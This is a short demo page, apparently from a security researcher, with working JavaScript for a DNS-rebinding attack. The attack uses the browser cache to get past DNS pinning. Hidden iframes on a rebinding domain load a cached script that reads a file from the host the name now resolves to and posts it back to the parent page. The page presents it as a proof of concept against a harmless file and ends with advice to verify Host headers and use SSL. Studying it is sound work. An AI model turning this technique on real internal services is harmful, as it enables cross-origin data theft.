Browser cache + DNS rebinding

Alok's DNS rebinding via browser cache

Browsers protect against DNS rebinding by caching DNS entries for the entire browser session, even if the time-to-live sent by the server is short.

This demo attempts to steal a (harmless) HTML file from

You need to visit this page twice; try closing your browser and opening it again.


// This is the script that will run inside each frame. It just fetches a file from its own host and posts the result back.

function framescript() {
  var x = new XMLHttpRequest();
  x.open('GET', '/js/blank.html?:CC=max-age=0&raw=try_again');
  x.onload = function() { parent.postMessage(x.responseText, '*'); };
  x.send();
}

window.onmessage = function(e) {
  // If we hit ourselves, the result is not interesting; ignore it.
  if (/try_again/.test(e.data)) return;
  document.getElementById('rightbox').textContent = e.data;
};

// Now create a bunch of frames. The host name will resolve to
// 50% of the time and this server the rest of the time.
// If it hits this server, it will serve the script above with a long
// cache lifetime.

// Placeholder: the rebinding domain was stripped from this page; substitute the real one.
var REBIND_DOMAIN = 'rebinding-domain.example';

for (var i = 0; i < 20; i++) {
  var f = document.createElement('iframe');
  f.setAttribute('style', 'width:10px; height:10px; border:none');
  f.src = 'http://4s.' + i + '.' + REBIND_DOMAIN +
          '/js/blank.html?:CC=max-age=86400&body[bgcolor=tan]&js=' + encodeURIComponent('!' + framescript + '()');
  document.body.appendChild(f);
}

(This uses the DNS thing and chargen to save some work)


Everything should verify the Host header. Everything. Also, SSL everywhere.

